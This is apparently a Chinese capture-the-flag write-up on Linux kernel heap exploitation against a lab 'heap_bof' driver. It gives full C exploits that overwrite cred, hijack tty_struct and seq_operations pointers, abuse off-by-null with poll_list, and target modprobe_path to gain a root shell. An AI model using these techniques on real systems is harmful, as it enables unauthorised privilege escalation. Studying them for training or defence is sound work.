1 2 3 4 5 6 7 8 9 10 11 12 13 14 void __init cred_init (void ) { cred_jar = kmem_cache_create("cred_jar" , sizeof (struct cred), 0 , SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL ); } void __init cred_init (void ) { cred_jar = kmem_cache_create("cred_jar" , sizeof (struct cred), 0 , SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL ); }
Overflow 溢出修改 cred ,和前面 UAF 修改 cred 一样,在新版本失效。多核堆块难免会乱序,溢出之前记得多申请一些0xc0大小的obj,因为我们 freelist 中存在很多之前使用又被释放的 obj 导致的 obj 乱序。我们需要一个排列整齐的内存块用于修改。
利用思路
多申请几个0xa8大小的内存块,将原有混乱的freelist 变为地址连续的 freelist。
利用堆溢出,修改被重新申请作为cred的ptr[5]凭证区为0。
/*
 * exp -- heap_bof, heap overflow into a neighbouring cred: groom the
 * 0xc0-byte cache, free slot 5, fork so that the child's cred is expected to
 * take that slot, then overflow from slot 4 into it with zero bytes.
 */
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Mirrors the driver's argument block. */
struct param {
    size_t len;
    char *buf;
    long long idx;
};

const int BOF_NUM = 10;

/* Bytes written from slot 4: one whole 0xc0 object plus 0x30 of the next. */
enum { OVERFLOW_LEN = 0xc0 + 0x30 };

int main(void)
{
    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd == -1) {
        puts("[-] Failed to open bof device.");
        exit(-1);
    }

    /*
     * The user buffer must hold the largest copy issued below. The original
     * allocated only 0xa8 bytes and then memset OVERFLOW_LEN bytes into it,
     * corrupting the exploit's own heap.
     */
    struct param p = {0xa8, calloc(1, OVERFLOW_LEN), 0};
    if (p.buf == NULL) {
        puts("[-] calloc error");
        exit(-1);
    }

    /* Drain stale freelist entries so later objects come out adjacent. */
    for (int i = 0; i < 0x40; i++) {
        ioctl(bof_fd, 5, &p);
    }
    puts("[*] clear heap done");

    for (p.idx = 0; p.idx < BOF_NUM; p.idx++) {
        ioctl(bof_fd, 5, &p);
    }

    /* Free slot 5 so the next cred allocation can take its place. */
    p.idx = 5;
    ioctl(bof_fd, 7, &p);

    int pid = fork();
    if (pid < 0) {
        puts("[-] fork error");
        exit(-1);
    }

    /* Parent and child both issue the overflowing write from slot 4. */
    p.idx = 4, p.len = OVERFLOW_LEN;
    memset(p.buf, 0, p.len);
    ioctl(bof_fd, 8, &p);

    if (!pid) {
        size_t uid = getuid();
        printf("[*] uid: %zx\n", uid);
        if (!uid) {
            puts("[+] root success");
            system("/bin/sh");
        } else {
            puts("[-] root fail");
        }
    } else {
        wait(0);
    }
    return 0;
}
tty_struct 劫持 boot.sh
这道题gadget较少,我们就关了smep保护。
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=1 \ --nographic
利用思路 在 /dev 下有一个伪终端设备 ptmx ,在我们打开这个设备时内核中会创建一个 tty_struct 结构体,
1 2 3 ptmx_open (drivers/tty/pty.c) -> tty_init_dev (drivers/tty/tty_io.c) -> alloc_tty_struct (drivers/tty/tty_io.c)
tty 的结构体 tty_struct 定义在 linux/tty.h 中。其中 ops 项(64bit 下位于结构体偏移 0x18 处)指向一个存放 tty 相关操作函数指针的结构体 tty_operations 。tty_struct 的魔数为 0x5401。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 #define TTY_MAGIC 0x5401 struct tty_struct { ... const struct tty_operations *ops ; ... } struct tty_operations { ... int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg); ... };
使用 tty 设备的前提是挂载了 ptmx 设备。
1 2 3 mkdir /dev/pts mount -t devpts none /dev/pts chmod 777 /dev/ptmx
所以我们只需要劫持 tty_ops 的某个可触发的操作即可,将其劫持到 get_root 函数处。
/*
 * exp -- heap_bof, tty_struct hijack: free a 0x2e0-byte object, open
 * /dev/ptmx so that a tty_struct is expected to reuse it, then point the
 * word at offset 0x18 (ops) at a fake operations table in user memory.
 *
 * The inline assembly is written in Intel syntax and loads the globals below
 * by symbol name, so build with GCC's -masm=intel option.
 */
#include <sys/wait.h>
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>

#define BOF_MALLOC 5
#define BOF_FREE 7
#define BOF_EDIT 8
#define BOF_READ 9

/* Kernel addresses for the non-randomised image; get_root() rebases them. */
void *(*commit_creds)(void *) = (void *) 0xffffffff810a1340;
size_t init_cred = 0xFFFFFFFF81E496C0;

/* User-mode landing point after privilege escalation. */
void get_shell(void)
{
    system("/bin/sh");
}

/*
 * User-mode context for the iretq frame built in get_root(). These must stay
 * globals with these exact names: the inline assembly references them.
 */
unsigned long user_cs, user_rflags, user_rsp, user_ss, user_rip = (size_t) get_shell;

/* Record cs, ss, rsp and rflags of the current user context. */
void save_status(void)
{
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("[*]status has been saved.");
}

size_t kernel_offset;

/*
 * Called by the kernel through the fake operations table. Derives the kernel
 * slide from a word on the stack, commits init_cred and returns to
 * get_shell() in user mode with swapgs + iretq.
 * NOTE(review): [rsp + 8] is presumably this function's return address into
 * the kernel (unslid value 0xffffffff814f604f); it depends on the prologue
 * the compiler emits -- re-check after changing compiler or flags.
 */
void get_root(void)
{
    __asm__(
        "mov rbx, [rsp + 8];"
        "mov kernel_offset, rbx;"
    );
    kernel_offset -= 0xffffffff814f604f;
    commit_creds = (void *) ((size_t) commit_creds + kernel_offset);
    /* init_cred is an integer here: add the slide directly and convert to a
     * pointer only at the call. */
    init_cred += kernel_offset;
    commit_creds((void *) init_cred);
    __asm__(
        "swapgs;"
        "push user_ss;"
        "push user_rsp;"
        "push user_rflags;"
        "push user_cs;"
        "push user_rip;"
        "iretq;"
    );
}

/* Mirrors the driver's argument block. */
struct param {
    size_t len;
    char *buf;
    long long idx;
};

int main(int argc, char const *argv[])
{
    (void) argc;
    (void) argv;
    size_t word;

    save_status();

    /*
     * Fake operations table: twelve empty entries followed by get_root.
     * NOTE(review): entry 12 is presumably the ioctl member of
     * tty_operations on this kernel -- confirm against its headers.
     */
    size_t fake_tty_ops[] = {
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        (size_t) get_root
    };

    struct param p = {0x2e0, malloc(0x2e0), 0};
    if (p.buf == NULL) {
        puts("[-] malloc error");
        return -1;
    }
    printf("[*]p_addr==>%p\n", (void *) &p);

    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd < 0) {
        puts("[-] Failed to open bof device.");
        return -1;
    }

    /* Allocate, fill and free a 0x2e0-byte object; slot 0 keeps the pointer. */
    p.len = 0x2e0;
    ioctl(bof_fd, BOF_MALLOC, &p);
    memset(p.buf, '\xff', 0x2e0);
    ioctl(bof_fd, BOF_EDIT, &p);
    ioctl(bof_fd, BOF_FREE, &p);

    int ptmx_fd = open("/dev/ptmx", O_RDWR);
    if (ptmx_fd < 0) {
        puts("[-] Failed to open /dev/ptmx.");
        return -1;
    }

    /* Read back the first 0x20 bytes of whatever now occupies the slot. */
    p.len = 0x20;
    ioctl(bof_fd, BOF_READ, &p);
    memcpy(&word, &p.buf[0], sizeof(word));
    printf("[*]magic_code==> %p -- %p\n", (void *) &p.buf[0], (void *) word);
    memcpy(&word, &p.buf[0x18], sizeof(word));
    printf("[*]tty____ops==> %p -- %p\n", (void *) &p.buf[0x18], (void *) word);

    /* Replace the word at offset 0x18 with the fake table and write it back. */
    word = (size_t) fake_tty_ops;
    memcpy(&p.buf[0x18], &word, sizeof(word));
    ioctl(bof_fd, BOF_EDIT, &p);

    /* Trigger the hijacked operation. */
    ioctl(ptmx_fd, 0, 0);
    return 0;
}
seq_operations 劫持 boot.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 512M \ -nographic \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet kaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=1 \ --nographic
利用思路 seq_operations 结构如下,该结构在打开 /proc/self/stat 时从 kmalloc-32 中分配。
1 2 3 4 5 6 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); };
调用读取 stat 文件时会调用 seq_operations 的 start 函数指针。
1 2 3 4 5 6 ssize_t seq_read (struct file *file, char __user *buf, size_t size, loff_t *ppos) { struct seq_file *m = file->private_data; ... p = m->op->start(m, &pos); ...
当我们在 heap_bof 驱动分配 0x20 大小的 object 后打开大量的 stat 文件就有很大概率在 heap_bof 分配的 object 的溢出范围内存在 seq_operations 结构体。由于这道题关闭了 SMEP,SMAP 和 KPTI 保护,因此我们可以覆盖 start 函数指针为用户空间的提权代码实现提权。至于 KASLR 可以通过泄露栈上的数据绕过。
/*
 * exp -- heap_bof, seq_operations hijack: allocate a 0x20-byte object, spray
 * seq_operations by opening /proc/self/stat many times, overflow from the
 * object with pointers to get_root, then read every stat file.
 *
 * The inline assembly is written in Intel syntax and loads the globals below
 * by symbol name, so build with GCC's -masm=intel option.
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>

/* Mirrors the driver's argument block. */
struct param {
    size_t len;
    char *buf;
    long long idx;
};

/* Enum constants, so that seq_fd[] below is an ordinary array, not a VLA. */
enum {
    SEQ_NUM = 0x200,        /* number of /proc/self/stat descriptors opened */
    DATA_SIZE = 0x20 * 8    /* bytes written by the overflowing edit */
};

#define BOF_MALLOC 5
#define BOF_FREE 7
#define BOF_EDIT 8
#define BOF_READ 9

/* User-mode landing point after privilege escalation. */
void get_shell(void)
{
    system("/bin/sh");
}

/*
 * User-mode context for the iretq frame built in get_root(). These must stay
 * globals with these exact names: the inline assembly references them.
 */
size_t user_cs, user_rflags, user_sp, user_ss, user_rip = (size_t) get_shell;

/* Record cs, ss, rsp and rflags of the current user context. */
void save_status(void)
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

/* Kernel addresses for the non-randomised image; get_root() rebases them. */
void *(*commit_creds)(void *) = (void *) 0xFFFFFFFF810A1340;
void *init_cred = (void *) 0xFFFFFFFF81E496C0;
size_t kernel_offset;

/*
 * Called by the kernel through an overwritten seq_operations pointer.
 * Derives the kernel slide from a word on the stack, commits init_cred and
 * returns to get_shell() in user mode with swapgs + iretq.
 * NOTE(review): [rsp + 8] is presumably this function's return address into
 * the kernel (unslid value 0xffffffff81229378); it depends on the prologue
 * the compiler emits -- re-check after changing compiler or flags.
 */
void get_root(void)
{
    __asm__(
        "mov rax, [rsp + 8];"
        "mov kernel_offset, rax;"
    );
    kernel_offset -= 0xffffffff81229378;
    commit_creds = (void *) ((size_t) commit_creds + kernel_offset);
    init_cred = (void *) ((size_t) init_cred + kernel_offset);
    commit_creds(init_cred);
    __asm__(
        "swapgs;"
        "push user_ss;"
        "push user_sp;"
        "push user_rflags;"
        "push user_cs;"
        "push user_rip;"
        "iretq;"
    );
}

int main(void)
{
    save_status();

    /* Absolute path, so the exploit works from any working directory. */
    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd < 0) {
        puts("[-] Failed to open bof.");
        exit(-1);
    }

    struct param p = {0x20, malloc(0x20), 0};
    if (p.buf == NULL) {
        puts("[-] malloc error");
        exit(-1);
    }

    /* Every allocation goes to slot 0; only the last one stays reachable. */
    for (int i = 0; i < 0x40; i++) {
        ioctl(bof_fd, BOF_MALLOC, &p);
    }
    memset(p.buf, '\xff', p.len);
    ioctl(bof_fd, BOF_EDIT, &p);

    int seq_fd[SEQ_NUM];
    for (int i = 0; i < SEQ_NUM; i++) {
        seq_fd[i] = open("/proc/self/stat", O_RDONLY);
        if (seq_fd[i] < 0) {
            puts("[-] Failed to open stat.");
        }
    }
    puts("[*] seq_operations spray finished.");

    /* Swap the 0x20-byte buffer for one large enough for the overflow. */
    free(p.buf);
    p.len = DATA_SIZE;
    p.buf = malloc(DATA_SIZE);
    if (p.buf == NULL) {
        puts("[-] malloc error");
        exit(-1);
    }
    p.idx = 0;

    /* Fill the payload with the address of get_root in every word. */
    size_t target = (size_t) get_root;
    for (int i = 0; i < DATA_SIZE; i += sizeof(size_t)) {
        memcpy(&p.buf[i], &target, sizeof(target));
    }
    ioctl(bof_fd, BOF_EDIT, &p);
    puts("[*] Heap overflow finished.");

    /* Reading each stat file is what triggers the overwritten pointer. */
    for (int i = 0; i < SEQ_NUM; i++) {
        read(seq_fd[i], p.buf, 1);
    }
    return 0;
}
off by null 现在我们假设这道题没有提供 free,并且只有单字节溢出,溢出的单字节还只能是 NULL,那么我们应该怎么去利用呢?
利用思路 boot.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/bash qemu-system-x86_64 \ -initrd rootfs.img \ -kernel bzImage \ -m 1G \ -append 'console=ttyS0 root=/dev/ram oops=panic panic=1 quiet nokaslr' \ -monitor /dev/null \ -s \ -cpu kvm64 \ -smp cores=1,threads=2 \ --nographic
poll系统调用
1 2 3 4 5 6 int poll (struct pollfd *fds, nfds_t nfds, int timeout) ;
poll_list 结构体对象是在调用 poll() 时分配,该调用可以监视 1 个或多个文件描述符的活动。
1 2 3 4 5 6 7 8 9 10 11 struct pollfd { int fd; short events; short revents; }; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; };
poll_list 结构如下图所示,前 30 个 poll_fd 在栈上,后面的都在堆上,最多 510 个 poll_fd 在一个堆上的 poll_list 上,堆上的 poll_list 最大为 0x1000。
poll_list 分配/释放
do_sys_poll 函数完成 poll_list 的分配和释放。poll_list 会在 poll 超时返回时自动释放,因此我们可以通过超时参数控制 poll_list 的释放时间。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 #define POLL_STACK_ALLOC 256 #define PAGE_SIZE 4096 #define POLLFD_PER_PAGE ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd)) #define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list)) / sizeof(struct pollfd)) [...] static int do_sys_poll (struct pollfd __user *ufds, unsigned int nfds, struct timespec64 *end_time) { struct poll_wqueues table ; int err = -EFAULT, fdcount, len; long stack_pps[POLL_STACK_ALLOC/sizeof (long )]; struct poll_list *const head = (struct poll_list *)stack_pps; struct poll_list *walk = head; unsigned long todo = nfds; if (nfds > rlimit(RLIMIT_NOFILE)) return -EINVAL; len = min_t (unsigned int , nfds, N_STACK_PPS); for (;;) { walk->next = NULL ; walk->len = len; if (!len) break ; if (copy_from_user(walk->entries, ufds + nfds-todo, sizeof (struct pollfd) * walk->len)) goto out_fds; todo -= walk->len; if (!todo) break ; len = min(todo, POLLFD_PER_PAGE); walk = walk->next = kmalloc(struct_size(walk, entries, len), GFP_KERNEL); if (!walk) { err = -ENOMEM; goto out_fds; } } poll_initwait(&table); fdcount = do_poll(head, &table, end_time); poll_freewait(&table); if (!user_write_access_begin(ufds, nfds * sizeof (*ufds))and) goto out_fds; for (walk = head; walk; walk = walk->next) { struct pollfd *fds = walk->entries; int j; for (j = walk->len; j; fds++, ufds++, j--) unsafe_put_user(fds->revents, &ufds->revents, Efault); } user_write_access_end(); err = fdcount; out_fds: walk = head->next; while (walk) { struct poll_list *pos = walk; walk = walk->next; kfree(pos); } return err; Efault: user_write_access_end(); err = -EFAULT; goto out_fds; }
我们可以去找到一些结构体,其头 8 字节是一个指针,然后利用 off by null 去损坏该指针,比如使得 0xXXXXa0 变成 0xXXXX00,然后就可以考虑利用堆喷去构造 UAF 了。
详细流程
首先分配一个 kmalloc-4096 大小的 object,保存在 ptr[0];
然后构造这样的poll_list结构体。
利用 off-by-null 将 poll_list->next 的最低一个字节改为空。然后大量分配 kmalloc-32 的 object,这里之所以是 32 字节大小,是因为要与后面的 seq_operations 配合,并且 32 字节大小的 object 其地址最低字节是可能为 \x00 的(可能的取值为 0x00、0x20、0x40、0x60、0x80、0xa0、0xc0、0xe0)。运气好的话,被我们篡改后的 poll_list->next 正好指向其中一个 object。但对于这道题来说,我们没有足够的堆块用于堆喷,所以成功率是极低的。
等待poll_list线程执行完毕,并且我们分配的kmalloc-32被错误释放,分配大量的seq_operations,运气好可以正好被分配到我们释放的kmalloc-32,形成UAF,这样我们就可以利用UAF修改seq_operations->start指针指向提权代码。
提权可以参考上一篇文章,利用栈上的残留值来bypass kaslr。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/sysinfo.h> #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_EDIT 8 #define BOF_READ 9 #define SEQ_NUM 
(2048 + 128) #define TTY_NUM 72 #define PIPE_NUM 1024 #define KEY_NUM 199 char buf[0x20 ];int bof_fd;int key_id[KEY_NUM];#define N_STACK_PPS 30 #define POLL_NUM 0x1000 #define PAGE_SIZE 0x1000 struct param { size_t len; char *buf; unsigned long idx; }; size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." ); } void get_shell (void ) { system("/bin/sh" ); } void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head #define __aligned(x) __attribute__((__aligned__(x))) typedef unsigned long long u64;struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; int key_alloc (int id, void *payload, int payload_len) { char description[0x10 ] = {}; sprintf (description, "pwn_%d" , id); return key_id[id] = syscall(__NR_add_key, "user" , description, payload, payload_len - sizeof (struct user_key_payload), KEY_SPEC_PROCESS_KEYRING); } int key_update (int id, void *payload, size_t plen) { return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen); } int key_read (int id, void *bufer, size_t buflen) { return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen); } int key_revoke (int id) { return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0 , 0 , 0 ); } 
int key_unlink (int id) { return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING); } pthread_t tid[40 ];typedef struct { int nfds, timer; } poll_args; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; }; void * alloc_poll_list (void *args) { int nfds = ((poll_args *) args)->nfds; int timer = ((poll_args *) args)->timer; struct pollfd *pfds = calloc (nfds, sizeof (struct pollfd)); for (int i = 0 ; i < nfds; i++) { pfds[i].fd = open("/etc/passwd" , O_RDONLY); pfds[i].events = POLLERR; } poll(pfds, nfds, timer); } void * create_poll_list (size_t size, int timer, int i) { poll_args *args = calloc (1 , sizeof (poll_args)); args->nfds = (size - (size + PAGE_SIZE - 1 ) / PAGE_SIZE * sizeof (struct poll_list)) / sizeof (struct pollfd) + N_STACK_PPS; args->timer = timer; pthread_create(&tid[i], NULL , alloc_poll_list, args); } struct list_head { struct list_head *next , *prev ; }; struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; }; struct page ;struct pipe_inode_info ;struct pipe_buf_operations ;struct pipe_bufer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *); void (*release)(struct pipe_inode_info *, struct pipe_bufer *); int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *); int (*get)(struct pipe_inode_info *, struct pipe_bufer *); }; void *(*commit_creds)(void *) = (void *) 0xFFFFFFFF810A1340 ;void *init_cred = (void *) 0xFFFFFFFF81E496C0 ;size_t user_rip = (size_t ) get_shell;size_t kernel_offset;void get_root () { __asm__( "mov rax, [rsp + 8];" "mov kernel_offset, rax;" ); kernel_offset -= 0xffffffff81229378 ; commit_creds = (void *) ((size_t ) commit_creds + kernel_offset); init_cred = (void *) ((size_t ) init_cred + kernel_offset); commit_creds(init_cred); __asm__( "swapgs;" "push 
user_ss;" "push user_sp;" "push user_rflags;" "push user_cs;" "push user_rip;" "iretq;" ); } int main () { save_status(); signal(SIGSEGV, (void *) get_shell); bof_fd = open("dev/bof" , O_RDWR); int seq_fd[SEQ_NUM]; printf ("[*] try to alloc_kmalloc-4096\n" ); size_t * mem = malloc (0x1010 ); memset (mem, '\xff' , 0x1010 ); struct param p = {0x1000 , (char *)mem, 0 }; ioctl(bof_fd, BOF_MALLOC, &p); printf ("[*] try to spary kmalloc-32\n" ); p.len = 0x20 ; for (int i = 1 ; i < 20 ; ++i) { p.idx = i; memset (mem, i, 0x20 ); memset (mem, 0 , 0x18 ); ioctl(bof_fd, BOF_MALLOC, &p); ioctl(bof_fd, BOF_EDIT, &p); } printf ("[*] try to alloc_poll_list\n" ); for (int i = 0 ; i < 14 ; ++i) { create_poll_list(PAGE_SIZE + sizeof (struct poll_list) + sizeof (struct pollfd), 3000 , i); } printf ("[*] try to spary kmalloc-32\n" ); p.len = 0x20 ; for (int i = 20 ; i < 40 ; ++i) { p.idx = i; memset (mem, i, 0x20 ); memset (mem, 0 , 0x18 ); ioctl(bof_fd, BOF_MALLOC, &p); ioctl(bof_fd, BOF_EDIT, &p); } sleep(1 ); p.len = 0x1001 ; p.idx = 0 ; memset (mem, '\x00' , 0x1001 ); ioctl(bof_fd, BOF_EDIT, &p); void *res; for (int i = 0 ; i < 14 ; ++i) { printf ("[*] wating for poll end\n" ); pthread_join(tid[i], &res); } for (int i = 0 ; i < 256 ; ++i) { seq_fd[i] = open("/proc/self/stat" , O_RDONLY); } sleep(1 ); for (int i = 1 ; i < 40 ; ++i) { p.idx = i; p.len = 0x20 ; ioctl(bof_fd, BOF_READ, &p); printf ("[%d->0] p->buf == %p\n" , i, (size_t *)mem[0 ]); printf ("[%d->1] p->buf == %p\n" , i, (size_t *)mem[1 ]); printf ("[%d->2] p->buf == %p\n" , i, (size_t *)mem[2 ]); printf ("[%d->3] p->buf == %p\n" , i, (size_t *)mem[3 ]); mem[0 ] = (size_t *)get_root; mem[1 ] = (size_t *)get_root; mem[2 ] = (size_t *)get_root; mem[3 ] = (size_t *)get_root; ioctl(bof_fd, BOF_EDIT, &p); } for (int i = 1 ; i < 40 ; ++i) { p.idx = i; p.len = 0x20 ; ioctl(bof_fd, BOF_READ, &p); printf ("[%d->0] p->buf == %p\n" , i, (size_t *)mem[0 ]); printf ("[%d->1] p->buf == %p\n" , i, (size_t *)mem[1 ]); printf ("[%d->2] 
p->buf == %p\n" , i, (size_t *)mem[2 ]); printf ("[%d->3] p->buf == %p\n" , i, (size_t *)mem[3 ]); } for (int i = 0 ; i < 256 ; i++) { read(seq_fd[i], p.buf, 1 ); } return 0 ; }
Arbitrary Address Allocation 利用思路 通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是,内核的 slub 堆管理器缺少检查,因此对要分配的目标地址要求不高,不过有一点需要注意:当我们分配到目标地址时,目标地址前 8 字节的数据会被写入 freelist,而这通常并非一个有效的地址,从而导致 kernel panic,因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。
当能够任意地址分配的时候,与 glibc 改 hook 类似,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
1 2 3 4 5 6 7 8 9 entry_SYSCALL_64() sys_execve() do_execve() do_execveat_common() bprm_execve() exec_binprm() search_binary_handler() __request_module() call_modprobe()
其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static int call_modprobe (char *module_name, int wait) { argv[0 ] = modprobe_path; argv[1 ] = "-q" ; argv[2 ] = "--" ; argv[3 ] = module_name; argv[4 ] = NULL ; info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL , free_modprobe_argv, NULL ); if (!info) goto free_module_name; return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 __int64 _request_module( char a1, __int64 a2, double a3, double a4, double a5, double a6, double a7, double a8, double a9, double a10, ...) { ...... if ( v19 ) { ...... v21 = call_usermodehelper_setup( (__int64)&byte_FFFFFFFF82444700, (__int64)v18, (__int64)&off_FFFFFFFF82444620, 3264 , 0LL , (__int64)free_modprobe_argv, 0LL ); ...... } .data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r .data:FFFFFFFF82444700 db 2F h ; / ; __request_module+14B ↑o ... .data:FFFFFFFF82444701 db 73 h ; s .data:FFFFFFFF82444702 db 62 h ; b .data:FFFFFFFF82444703 db 69 h ; i .data:FFFFFFFF82444704 db 6 Eh ; n .data:FFFFFFFF82444705 db 2F h ; / .data:FFFFFFFF82444706 db 6 Dh ; m .data:FFFFFFFF82444707 db 6F h ; o .data:FFFFFFFF82444708 db 64 h ; d .data:FFFFFFFF82444709 db 70 h ; p .data:FFFFFFFF8244470A db 72 h ; r .data:FFFFFFFF8244470B db 6F h ; o .data:FFFFFFFF8244470C db 62 h ; b .data:FFFFFFFF8244470D db 65 h ; e .data:FFFFFFFF8244470E db 0
